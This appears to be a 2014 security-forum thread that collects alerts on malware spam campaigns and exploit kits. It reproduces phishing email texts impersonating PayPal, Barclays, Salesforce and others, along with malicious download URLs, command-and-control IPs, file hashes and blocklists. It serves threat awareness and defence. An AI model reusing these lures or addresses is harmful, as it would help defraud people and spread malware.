Current Virus total detections: 13/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1fd1e3787b4982b6029ebd9859d6aff3bd313903a2322c29a80bbd105a5651ac/analysis/1413274440/
___

YouTube Ads lead to Exploit Kits ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
Oct 14, 2014 - "Malicious ads are a common method of sending users to sites that contain malicious code. Recently, however, these ads have showed up on a new attack platform: YouTube. Over the past few months, we have been monitoring a malicious campaign that used malicious ads to direct users to various malicious sites. Users in the United States have been affected almost exclusively, with more than 113,000 victims in the United States alone over a 30-day period.
Countries affected by this malicious ad campaign:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/malad.jpg
Recently, we saw that this campaign was showing up in ads via YouTube as well. This was a worrying development: not only were malicious ads showing up on YouTube, they were on videos with more than 11 million views – in particular, a music video uploaded by a high-profile record label. The ads we’ve observed do not -directly- lead to malicious sites from YouTube. Instead, the traffic passes through two advertising sites, suggesting that the cybercriminals behind this campaign bought their traffic from legitimate ad providers. In order to make their activity look legitimate, the attackers used the -modified- DNS information of a Polish government site. The attackers did not compromise the actual site; instead they were able to change the DNS information by adding subdomains that lead to their own servers. (How they were able to do this is unclear.) The traffic passes through two -redirection- servers (located in the Netherlands) before ending up at the malicious server, located in the United States. The exploit kit used in this attack was the Sweet Orange exploit kit. Sweet Orange is known for using four vulnerabilities, namely:
CVE-2013-2460 – Java
CVE-2013-2551 – Internet Explorer
CVE-2014-0515 - Flash
CVE-2014-0322 – Internet Explorer
Based on our analyses of the campaign, we were able to identify that this version of Sweet Orange uses vulnerabilities in Internet Explorer. The URL of the actual payload constantly changes, but they all use subdomains on the same Polish site mentioned earlier. However, the behavior of these payloads are identical. The final payloads of this attack are variants of the KOVTER malware family, which are detected as TROJ_KOVTER.SM. This particular family is known for its use in various ransomware attacks, although they lack the encryption of more sophisticated attacks like Cryptolocker. The websites that TROJ_KOVTER.SM accesses in order to display the fake warning messages are no longer accessible. Users who keep their systems up to date will not affected by this attack, as Microsoft released a patch for this particular vulnerability in May 2013. We recommend that read and apply the software security advisories by vendors like Microsoft, Java, and Adobe, as old vulnerabilities are still being exploited by attackers. Applying the necessary patches is essential part of keeping systems secure..."

:mad: :fear::fear:

AplusWebMaster
2014-10-15, 14:58
FYI...

Fake delivery SPAM - word doc malware ...
- http://myonlinesecurity.co.uk/inform-package-way-fake-word-doc-malware/
15 Oct 2014 - "An email pretending that you have purchased an unspecified item from an unspecified store saying 'This is to inform you that the package is on its way to you' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Thank you for buying at our store!
Date ordered: October 14 2014
This is to inform you that the package is on its way to you. We also included delivery file to your shipping address.
Payment Nr : 7795816097 Order total : 527.54 USD Delivery date : 10/ 22th 2014.
Please review the attached document.

15 October 2014: 0048898757_order _doc.zip: Extracts to: 0048898757_order _doc.exe
Current Virus total detections: 7/54* . This 'This is to inform you that the package is on its way to you' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8c41235f43356c845b193b04efa60bbecb1787028e8ad6e25eb4c01ee2d94804/analysis/1413361301/
___

Fake 'Shipping Info' SPAM
- http://blog.dynamoo.com/2014/10/shipping-information-for-spam-uses.html
15 Oct 2014 - "This fake shipping spam contains malware.. although it appears that it may be buggy and might not install properly.

Screenshot: https://3.bp.blogspot.com/-l3nlpqmPSoo/VD6K3ZdvApI/AAAAAAAAF1E/a_k4VUkXNX0/s1600/shipping-info.png

The link in the email goes to https ://www.google .com/url?q=https%3A%2F%2Fcopy.com%2FEl9fd4VfLkfN%2FTrackShipment_0351.PDF.scr%3Fdownload%3D1&sa=D&sntz=1&usg=AFQjCNE0-3UrX7jNPzSGYodsQVzmBhrwMA which bounces through Google and then downloads a malicious executable TrackShipment_0351.PDF.scr which has a VirusTotal detection rate of 4/54*... What I think is meant to happen is that a malicious script that has been disguising itself as a GIF file which then renames a component Gl.png to Gl.exe and then attempts to execute it... This executable has a VirusTotal detection rate of 2/53**. It bombs out of automated analysis tools... possibly because it is being executed with the wrong parameters. It also opens a seemingly legitimate PDF file (VT 0/54***) which is designed to look like a Commercial Invoice, presumably to mask the fact that it is doing something malicious in the background.
> https://4.bp.blogspot.com/-86SXLSZk37U/VD6PBROpsAI/AAAAAAAAF1c/ZRCiUJev-KI/s1600/commerical-invoice.png
If you opened a file similar to this and you saw a PDF with a blank Commercial Invoice like the one pictured above, then you've probably been -infected- by the executable running in the background."
* https://www.virustotal.com/en-gb/file/e5f0ea546dcfb99803c9a02df82f587fa09b16c87337e868d8eabf360178ba59/analysis/1413383394/

** https://www.virustotal.com/en-gb/file/f9cca52c9d840f3cfc8997e77a42ebc7640ea71f7729fa1782d8596a05ed963b/analysis/1413384221/

*** https://www.virustotal.com/en-gb/file/409e472b667ae747942e10d4dc691796c3b2eb00a0e407146e69b2f8205de40c/analysis/1413384174/
___

Fake Paypal SPAM – PDF malware
- http://myonlinesecurity.co.uk/paypal-transaction-complete-fake-pdf-malware/
15 Oct 2014 - "'Transaction not complete' pretending to come from PayPal is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Unable to complete your most recent Transaction.
Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please see attached payment receipt .

15 October 2014: Transaction25765048.zip: Extracts to: Transaction_21633987.scr
Current Virus total detections: 7/54* . This 'Transaction not complete' pretending to come from PayPal is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4b742cf87e49bc1cca0ce474ac34dd04ae00e28783aeafcfcd5a45a369be6543/analysis/1413387437/

:fear: :mad:

AplusWebMaster
2014-10-16, 23:23
FYI...

Fake Bank SPAM
- http://blog.dynamoo.com/2014/10/barclays-bank-transaction-not-complete.html
16 Oct 2016 - "This fake Barclays spam leads to malware.
From: Barclays Bank [Barclays@email .barclays .co.uk]
Date: 16 October 2014 12:48
Subject: Transaction not complete
Unable to complete your most recent Transaction.
Currently your transaction has a pending status. If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt below...

Clicking on the link downloads a file document23_pdf.zip containing a malicious executable document23_pdf.scr which has a VirusTotal detection rate of 4/54*. The Malwr report shows that it reaches out to the following URLs:
http ://188.165.214.6 :12302/1610uk1/HOME/0/51-SP3/0/
http ://188.165.214.6 :12302/1610uk1/HOME/1/0/0/
http ://188.165.214.6 :12302/1610uk1/HOME/41/5/1/
http ://jwoffroad .co.uk/img/t/1610uk1.osa
In my opinion 188.165.214.6 (OVH, France) is an excellent candidate to -block- or monitor. It also drops two executables, bxqyy.exe (VT 5/54** ...) and ldplh.exe (VT 1/51*** ...)."
* https://www.virustotal.com/en/file/626687777469a5a1cca0303fd565ee230fb5f5799a6d8cbaec097a5f7266eb28/analysis/1413462043/
... Behavioural information
DNS requests
jwoffroad .co.uk (88.208.252.216)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
88.208.252.216: https://www.virustotal.com/en/ip-address/88.208.252.216/information/

** https://www.virustotal.com/en/file/8d5d66e390e2293bec87422dfa2f4683b423e8084a07de207a75d2831f88d9a8/analysis/1413462507/

*** https://www.virustotal.com/en/file/752afd97f0473ec909797c02ac49b3f33e94ca06d6678af517d6d2fe98e00341/analysis/1413462517/
___

Many .su and .ru domains leading to malware
- http://blog.dynamoo.com/2014/10/a-bunch-of-su-and-ru-domains-leading-to.html
16 Oct 2016 - "These sites lead to some sort of malware. The presence of .SU domains hosted on what looks like a botnet is probably all you need to know.... recommend watching out for these..."
(Long list at the dynamoo URL above.)

- https://www.abuse.ch/?p=3581

- http://blog.dynamoo.com/2013/03/zbot-sites-to-block.html
"The obsolete .su (Soviet Union) domain is usually a tell-tale sign..."

___

Fake Invoice SPAM
- http://myonlinesecurity.co.uk/re-invoice-4023390-fake-pdf-malware/
16 Oct 2016 - "'RE: Invoice #4023390' pretending to come from Sage Accounting < Alfonso.Williamson@ sage-mail .com >is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please see attached copy of the original invoice.

16 October 2014: Invoice_4017618.zip: Extracts to: Invoice_4017618.exe
Current Virus total detections: 5/54* . This RE: Invoice #4023390 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e9645b9120975b47e440f60c182e4701e14c9f653a55bb0b4bec82bb71fe1c2d/analysis/1413490281/
... Behavioural information
DNS requests
lewis-teck .co.uk (5.77.44.47)
TCP connections
188.165.214.6: https://www.virustotal.com/en/ip-address/188.165.214.6/information/
5.77.44.47: https://www.virustotal.com/en/ip-address/5.77.44.47/information/

:fear::fear: :mad:

AplusWebMaster
2014-10-17, 13:50
FYI...

Fake Sage Invoice SPAM - malware
- http://blog.dynamoo.com/2014/10/sage-outdated-invoice-spam-spreads.html
17 Oct 2014 - "This -fake- Sage email spreads malware using a service called Cubby, whatever that is.

Screenshot: https://2.bp.blogspot.com/-UFvbcQMZeqc/VEDn4-OJqZI/AAAAAAAAF2I/M7n6GtqZVRM/s1600/sage3.png

Despite appearances, the link in the email (in this case) actually goes to https ://www.cubbyusercontent .com/pl/Invoice_032414.zip/_8deb77d3530f43be8a3166544b8fee9d and it downloads a file Invoice_032414.zip. This in turn contains a malicious executable Invoice_032414.exe which has a VirusTotal detection rate of 3/53*. The Malwr report shows HTTP conversations with the following URLs:
http :// 188.165.214.6 :15600/1710uk3/HOME/0/51-SP3/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/1/0/0/
http :// 188.165.214.6 :15600/1710uk3/HOME/41/5/1/
http :// tonysenior .co.uk/images/IR/1710uk3.osa
188.165.214.6 is (not surprisingly) allocated to OVH France. In turn, it drops an executable bcwyw.exe (VT 6/54**...) which communicates with 66.102.253.25 (a China Telecom address located in the US in a Rackspace IP range) and also moxbk.exe (VT 1/52***...).
Recommended blocklist:
188.165.214.6
66.102.253.25
tonysenior .co.uk "
* https://www.virustotal.com/en-gb/file/a772bdadac8a2f4819519e3ffb10a4aca141d64d78660e78e6f42a6ceb509183/analysis/1413539374/
... Behavioural information
DNS requests
tonysenior .co.uk (66.7.214.212)
TCP connections
188.165.214.6: https://www.virustotal.com/en-gb/ip-address/188.165.214.6/information/
66.7.214.212: https://www.virustotal.com/en-gb/ip-address/66.7.214.212/information/

** https://www.virustotal.com/en-gb/file/30dc00ee245dc553d569b94cc13f1acfed70740c7c10405d164694bc7d065f9d/analysis/1413540238/

*** https://www.virustotal.com/en-gb/file/3a281070d196e0906851550c51c319843c0c99198a2f7b2e393e433aa0cb0b68/analysis/1413540261/
___

Fake 'SalesForce Security Update' SPAM – malware
- http://myonlinesecurity.co.uk/october-17-2014-salesforce-security-update-malware/
17 Oct 2014 - "'October 17, 2014 SalesForce Security Update' pretending to come from SalesForce .com <no-reply@ salesforce .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The malware inside this zip file is at this time -undetected- by any antivirus on Virus Total* and to make it much worse the Virus Total engine tries to tell you that the file is Probably harmless! There are strong indicators suggesting that this file is safe to use. This is an even bigger problem than it normally would be because of the recent Poodle bug and servers consequently changing their encryption routines to remove the vulnerable SSLv3 version from being used. It is eminently believable that you might need to change the SSL certificate on your browser to comply with the new behaviour if you are not a security or network IT specialist. This is obviously -wrong- and this type of malware that disguises itself as a legitimate file and can apparently conceal the malicious functions from an antivirus scan and make it believe it is innocent is very worrying. The MALWR analysis doesn’t show -anything- wrong and doesn’t show any network connections or other files downloaded. Anubis also comes up with a -nothing- on this one... a couple of manual analysis done by Virus total** users who find it -is- malicious... drops this file which -is- detected... Our friends at TechHelpList(1) have done an analysis on this one which clearly shows its bad behaviour and what it connects to and downloads...
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/

** https://www.virustotal.com/en/file/93691ef6e834951225ad024a6b662e857a47c2f5156e3def9f38ae964143c241/analysis/

1) https://techhelplist.com/index.php/spam-list/664-date-salesforce-security-update-virus

The email looks like:
Dear client,
You are receiving this notification because your Salesforce SSL certificate has expired.
In order to continue using Salesforce.com, you are required to update your digital certificate.
Download the attached certificate. Update will be automatically installed by double click.
According to our Terms and Conditions, failing to renew the SSL certificate will result in account suspension or cancelation... Thank you for using Salesforce .com

17 October 2014: cert_update.zip: Extracts to: cert_update.scr
Current Virus total detections: 0/52* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an icon of a white & red circular arrow instead of the .scr ( executable) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/9519da9cbbf2a13b24e807f40d1537bb1913818ea91ecfe95323326f96632617/analysis/1413556548/
___

Fake eFax SPAM
- http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html
17 Oct 2014 - "This fake eFax spam leads to malware:
From: eFax [message@ inbound .claranet .co.uk]
Date: 17 October 2014 11:36
Subject: eFax message from "02086160204" - 1 page(s), Caller-ID: 208-616-0204
Fax Message [Caller-ID: 208-616-0204]
You have received a 1 page fax at 2014-10-17 09:34:48 GMT.
* The reference number for this fax is lon2_did11-4056638710-9363579926-02.
Please visit... to view this message in full...

The link in the email goes to some random hacked WordPress site or other with a URL with a format similar to the following:
http ://tadarok .com/wp-content/themes/deadline/mess.html
http ://107.170.219.47 /wp-content/themes/inove/mess.html
http ://dollfacebeauty .com.au/wp-content/themes/landscape/mess.html
Then (if your user agent and referrer are correct) it goes to a -fake- eFax page at http ://206.253.165.76 :8080/ord/ef.html which does look pretty convincing. (Incidentally if the UA or referrer are not right you seem to get dumped on a pills site of naturaldietpills4u .com).

Screenshot: https://1.bp.blogspot.com/-IzglVG8I_co/VED-m9ehHQI/AAAAAAAAF2Y/HyA5Tk30D9E/s1600/efax2.png

The download link goes to http ://206.253.165.76: 8080/ord/FAX_20141008_1412786088_26.zip which is a ZIP file containing a malicious executable FAX_20141008_1412786088_26.exe which has a VirusTotal detection rate of 4/54*... Recommended blocklist:
107.170.19.156
212.59.117.207
206.253.165.76 "
* https://www.virustotal.com/en-gb/file/b2b9486a36dff94a3222c16d309c073da61a98dfa1c1d303b5d3740f54842ff6/analysis/1413545028/
___

Fake Virgin Media SPAM - phish/malware
- http://myonlinesecurity.co.uk/help-advice-virgin-media-malware/
17 Oct 2014 - "An email with a subject of 'Help & Advice – Virgin Media' pretending to come from Virgin Media is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Virgin Media Automated Billing Reminder
Date 17th October 2014
This e-mail has been sent you by Virgin Media to inform you that we were unable to process your most recent payment of bill. This might be due to one of the following reasons:
A recent change in your personal information such as Name or address.
Your Credit or Debit card has expired.
Insufficient funds in your account.
Cancellation of Direct Debit agreement.
Your Card issuer did not authorize this transaction.
To avoid Service interruption you will need to update your billing profile, failure to update your profile may lead in service cancellation and termination.
Please click on the link below to login to e-Billing. You will need to login using your primary E-mail address...

Be very careful with email attachments. -All- of these emails use Social engineering tricks to persuade you to open the attachments or follow the links... -Never- just blindly click on the file in your email program. Always save the file to your downloads folder, so you can check it first. Most ( if not all) malicious files that are attached to emails will have a -faked- extension..."
___

More Free Facebook Hacks ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/more-free-facebook-hacking-sites-surface-online/
Oct 16, 2014 - "... more sites claiming to offer hacking services that target Facebook users. The sites are:
fbwand(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/fbwand.png

hackfbaccountlive(dot)com
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackfbaccountlive.png

One starts off by entering the profile URL of the Facebook user account (the target) he/she wants to hack. The site then makes him/her believe that an -actual- hacking is ongoing, firstly, by retrieving and displaying specific information from Facebook’s Graph Search*, such as user ID, user name, and a large version of the profile photo, to the page; and, secondly, by providing the attacker the progress of completion of each hacking attempt. Below are screenshots of these attempts, beginning with purportedly fetching the target’s email ID:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/05-verify.png?w=564
After a successful “hack”, the site informs the attacker that they have created an account for them on the website, complete with a generated user name and password, and that they have to log in to their accounts to retrieve the target’s Facebook account details. Just when it seems too easy, the attacker sees this upon logging in:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/hackers-panel.png
He/She is instructed to unlock the details in two ways. One is to share a generated referral link to their social networks (particularly Facebook and/or Twitter) in order to get 15 visitors to click it... Although it’s true that no website is perfectly secure one must not attempt to hack into them nor break into someone else’s online profile. These are illegal acts. Sites marketing themselves as free, user-friendly hacking-as-a-service (HaaS) tool, such as those I mentioned here, generally takes advantage of user distrust against someone and profits on it, promising big but deliver nothing in the end. Avoid them at all cost."
* https://www.facebook.com/about/graphsearch
___

Ebola Phishing Scams and Malware Campaigns
- https://www.us-cert.gov/ncas/current-activity/2014/10/16/Ebola-Phishing-Scams-and-Malware-Campaigns
Oct 16, 2014 - "... protect against email scams and cyber campaigns using the Ebola virus disease (EVD) as a theme. Phishing emails may contain links that direct users to websites which collect personal information such as login credentials, or contain malicious attachments that can infect a system. Users are encouraged to use caution when encountering these types of email messages and take the following preventative measures to protect themselves:
- Do not follow unsolicited web links or attachments in email messages.
- Maintain up-to-date antivirus software..."
___

CUTWAIL Spambot Leads to UPATRE-DYRE Infection
- http://blog.trendmicro.com/trendlabs-security-intelligence/cutwail-spambot-leads-to-upatre-dyre-infection/
Oct 16, 2014 - "... new spam attack disguised as invoice message notifications was recently seen spreading the UPATRE malware, that ultimately downloads its final payload- a BANKER malware related to the DYREZA/DYRE banking malware... In early October we observed a surge of spammed messages sent by the botnet CUTWAIL/PUSHDO, totaling to more than 18,000 messages seen in a single day. CUTWAIL/PUSHDO has been in the wild since as early as 2007 and was considered one of the biggest spam botnets in 2009. We spotted some spammed emails that disguise itself as invoice message notifications or “new alert messages” from various companies and institutions.
Screenshot of spammed messages related to CUTWAIL/PUSHDO:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Cutwail_samples.jpg
Top spam sending countries for this CUTWAIL spam run:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/Top-spam-sending-countries-01.jpg
... Based on our 1H 2014 spam report, UPATRE is the top malware seen in spam emails. With its continuously developing techniques, UPATRE remains as one of most prevalent malware today. Examples of newer UPATRE techniques are its ability to use password-protected archives as attachments, and abuse of online file storage platform, Dropbox in order to bypass spam filters.
Top malware distributed via spam as of August 2014:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/CUTWAIL-Spambot_fig1.jpg
... in this attack, this UPATRE variant, TROJ_UPATRE.YYJS downloads the final payload, TSPY_BANKER.COR, which is related to DYREZA/DYRE banking malware. The DYREZA malware is a banking malware with the following capabilities:
- Performs man-in-the-middle attacks via browser injections
- Steals banking credentials and monitors online banking session/transactions
- Steals browser snapshots and other information
Based on our analysis, TSPY_BANKER.COR connects to several websites to receive and send information. Given this series of malware infections, affected systems also run the risk of having their sensitive data stolen (such as banking credentials data) in order to be used for other future attacks. Apart from the risk of stolen information, this spam attack also highlights the risk of traditional threats (like spam) being used as a vehicle for -other- advanced malware to infect systems. This may consequently even lead to infiltrating an entire enterprise network... We highly recommend that users take extra caution when dealing with emails that contain attachments and URLs in the email body. Ensure that the domains are legitimate and take note of the company name indicated in the email. Another tip is to steer clear of suspicious-looking archive files attached to emails, such as those ending in .ZIP, or .RAR. UPATRE is also known to use email templates through DocuSign with emails that come in the form of -bank- notifications, -court- notices, and -receipts- ..."
___

WhatsApp Spam
- http://threattrack.tumblr.com/post/100162392338/whatsapp-spam
Oct 16, 2014 - "Subjects Seen:
Voice Message Notification
Typical e-mail details:
You have a new voicemail!
Details:
Time of Call: Oct-13 2014 06:02:04
Lenth of Call: 07sec

Malicious URLs:
p30medical .com/dirs.php?rec=LLGIAmEUFLipINmiPz4S0g
Malicious File Name and MD5:
VoiceMail.zip (713A7D2A9930B786FE31A603CD06B196)
VoiceMail.exe (2B7E9FC5A65FE6927A84A35B5FEAC062)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/5fe4acaac97621cafb4688b950049ac6/tumblr_inline_ndjlwzSYyI1r6pupn.png

Tagged: Whatsapp, Kuluoz

:fear::fear: :mad:

AplusWebMaster
2014-10-19, 07:00
FYI...

Evil network: 5.135.230.176/28 - OVH
- http://blog.dynamoo.com/2014/10/evil-network-513523017628-ovh-eldar.html
18 Oct 2014 - "These domains are currently hosted or have recently been hosted on 5.135.230.176/28 and all appear to be malicious in some way, in particular some of them have been hosting the Angler EK* (hat tip)... 5.135.230.176/28 is an OVH IP range allocated to what might be a ficticious customer:
organisation: ORG-EM25-RIPE
org-name: eldar mahmudov
org-type: OTHER
address: ishveran 9
address: 75003 paris
address: FR
e-mail: mahmudik@ hotmail .com
abuse-mailbox: mahmudik@ hotmail .com
phone: +33.919388845
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ ovh .net 20140621
source: RIPE
There appears to be nothing legitimate at all in this IP address range, I strongly recommend that you -block- traffic going to it."
* http://malware-traffic-analysis.net/2014/10/06/index.html

Diagnostic page for AS16276 (OVH)
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276
"... over the past 90 days, 4009 site(s)... resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-10-18, and the last time suspicious content was found was on 2014-10-18... we found 543 site(s) on this network... that appeared to function as intermediaries for the infection of 4498 other site(s)... We found 1150 site(s)... that infected 2883 other site(s)..."
___

malwr
- https://malwr.com/
Oct. 19, 2014 - "Last Comments:
Malware.
222.236.47.53:8080 195.206.7.69:443 46.55.222.24:8080 162.144.60.252:8080 91.212.253.253:443 95.141.32.134:8080"
- https://malwr.com/about/ >> http://www.shadowserver.org/ *

- 222.236.47.53: https://www.virustotal.com/en/ip-address/222.236.47.53/information/
- 195.206.7.69: https://www.virustotal.com/en/ip-address/195.206.7.69/information/
- 46.55.222.24: https://www.virustotal.com/en/ip-address/46.55.222.24/information/
- 162.144.60.252: https://www.virustotal.com/en/ip-address/162.144.60.252/information/
- 91.212.253.253: https://www.virustotal.com/en/ip-address/91.212.253.253/information/
- 95.141.32.134: https://www.virustotal.com/en/ip-address/95.141.32.134/information/

Bot Count Graphs
* https://www.shadowserver.org/wiki/pmwiki.php/Stats/BotCountYearly#toc1
Page last modified on Sunday, 19 October 2014
___

- http://blog.dynamoo.com/2014/10/final-notification-malware-spam-uses.html
17 Oct 2014
... ShippingLable_HSDAPDF.scr
- https://www.virustotal.com/en/file/9ad980467347dffbb50493c93ca834c40dbfdec61fc1339004a107aef6633ed2/analysis/1413566277/
... Comments:
Full list of CnCs:
5.135.28.118: https://www.virustotal.com/en/ip-address/5.135.28.118/information/
185.20.226.41: https://www.virustotal.com/en/ip-address/185.20.226.41/information/
5.63.155.195: https://www.virustotal.com/en/ip-address/5.63.155.195/information/
___

RIG Exploit Kit Dropping CryptoWall 2.0
- http://www.threattracksecurity.com/it-blog/rig-exploit-kit-dropping-cryptowall-2-0/
Oct 17, 2014 - "... observed spammers exploiting vulnerable WordPress links to -redirect- users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0... nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom. The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog*... The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp ://206.253.165.76 :8080. The exploit redirector is hxxp ://206.253.165.76 :8080/ord/rot.php. And the spam Dynamoo reported is hxxp ://206.253.165.76 :8080/ord/ef.html... The exploit redirector is hxxp :// 206.253.165.76 :8080/ord/rot.php... malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0. The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402 ..."
* http://blog.dynamoo.com/2014/10/efax-message-from-02086160204-spam.html

206.253.165.76: https://www.virustotal.com/en/ip-address/206.253.165.76/information/

:mad: :fear:

AplusWebMaster
2014-10-20, 14:41
FYI...

Fake 'unpaid invoice' SPAM - xls malware
- http://myonlinesecurity.co.uk/acorn-engineering-limited-trading-unpaid-invoice-court-action-fake-excel-xls-malware/
20 Oct 2014 - "An email pretending to be an unpaid invoice and threatening court action with a subject of 'Acorn Engineering Limited trading' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Acorn-Maintenance-Engineering-logo...
October 20, 2014
Head Office
Acorn Engineering Limited trading
as Acorn Maintenance
Acorn House
20 Wellcroft Road
Slough
Berkshire
SL1 4AQ
Tel: 01753 386 073
Fax: 01753 409 672
Dear ...
Reference: 48771955-A8
Court action will be the consequence of your ignoring this letter.
Despite our telephone calls on October 10 and our letters of September 25, 2014 and October 20, 2014, and your promise to pay, payment of your account has still not been received. If full payment is not received by October 22, 2014 court action will be taken against your company.
If you allow this to happen you will incur court costs and you may forfeit your company’s credit status because the name of your company will be recorded by the major credit reference agencies. This may deter others from supplying you.
You are also being charged debt recovery costs and statutory interest of 8% above the reference rate (fixed for the six month period within which date the invoices became overdue) pursuant to the late payment legislation.
To stop this from happening please pay in full now the overdue invoice which is also attached to this letter.
Yours truly,
signature-Mishenko.gif (626?272)
Nadine Cox,
Accountant
Acorn Engineering Limited
Enclosure (Attachment)

20 October 2014: Copy4313_B0.zip: Extracts to: Invoice_7380901925299.xls.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Excel xls file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/02b93640df6c19e6e77de029688e7dc2cdf6cf0a8a8f68ea0e1777d2ddd98097/analysis/1413800273/
___

Fake PDF invoice SPAM
- http://www.symantec.com/connect/blogs/pdf-invoices-may-cost-more-you-expect
Oct 20, 2014 - "... Over the past week, Symantec has observed a spam campaign involving suspicious emails that masquerade as unpaid invoices. However, these suspicious emails come with a nasty surprise attached in the form of a malicious .pdf file.
Malicious .pdf file attached to suspicious email:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Fig1_19.png
While these invoices may appear to be legitimate because the sender’s email address may be associated with a major company, the emails contain spelling errors in the subject line and the body of the email contains just one line of text. Most business emails contain a personal greeting to the recipient and the sender’s signature, but these emails have neither. These signs should serve as warnings to users that the email is not what it claims to be. The attached .pdf file has malicious shellcode hidden inside of it that will be executed when opened with a vulnerable version of Adobe Reader... attackers are trying to exploit the Adobe Acrobat and Reader Unspecified Remote Integer Overflow Vulnerability (CVE-2013-2729) by triggering the vulnerability while parsing the crafted Bitmap encoded image... The embedded shellcode acts as a downloader which downloads a malicious executable file (Infostealer.Dyranges) from a remote location. The downloaded malware attempts to install itself as a service called “google update service”... If successful, the malware is then able to steal confidential information entered into Web browsers by the user. Symantec recommends that users exercise caution when opening emails and attachments from unexpected or unknown senders. We also advise that PDF viewers and security software be kept up-to-date. Symantec detects the malicious .pdf file used in this campaign as Trojan.Pidief*."
* http://www.symantec.com/security_response/writeup.jsp?docid=2009-121708-1022-99&tabid=2
___

Fake 'LogMeIn Security Update' SPAM – PDF malware
- http://myonlinesecurity.co.uk/october-16-2014-logmein-security-update-fake-pdf-malware/
20 Oct 2014 - "An email that says it is an announcement that you need to install a new 'LogMeIn security certificate' which pretends to come from LogMeIn .com < auto-mailer@ logmein .com > with a subject of October 16, 2014 'LogMeIn Security Update' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/LogMeIn-security-update.png

20 October 2014: cert_client.zip: Extracts to: cert_1020.scr
Current Virus total detections: 1/52* . This October 16, 2014 'LogMeIn Security Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a legitimate file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/19d11eec77e1f1b6179005277d67a8640b5f5bf573dac486c7e1e6baea227c59/analysis/1413811609/
___

Fake 'my new photo ;)' SPAM - trojan variant
- http://blog.mxlab.eu/2014/10/20/latest-email-my-new-photo-contains-a-new-trojan-variant/
Oct 20, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “my new photo ;)”... sent from the spoofed email addresses and has the following short body:

my new photo ;)

The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 57 kB large file photo.exe . The trojan is known as a variant of HEUR/QVM03.0.Malware.Gen or Win32:Malware-gen. At the time of writing, 2 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en-gb/file/83912dc14a7de0ae2dbc6f12f2a5dbb54e2d94861ec6214163eaa2031df1b9b5/analysis/1413812842/
___

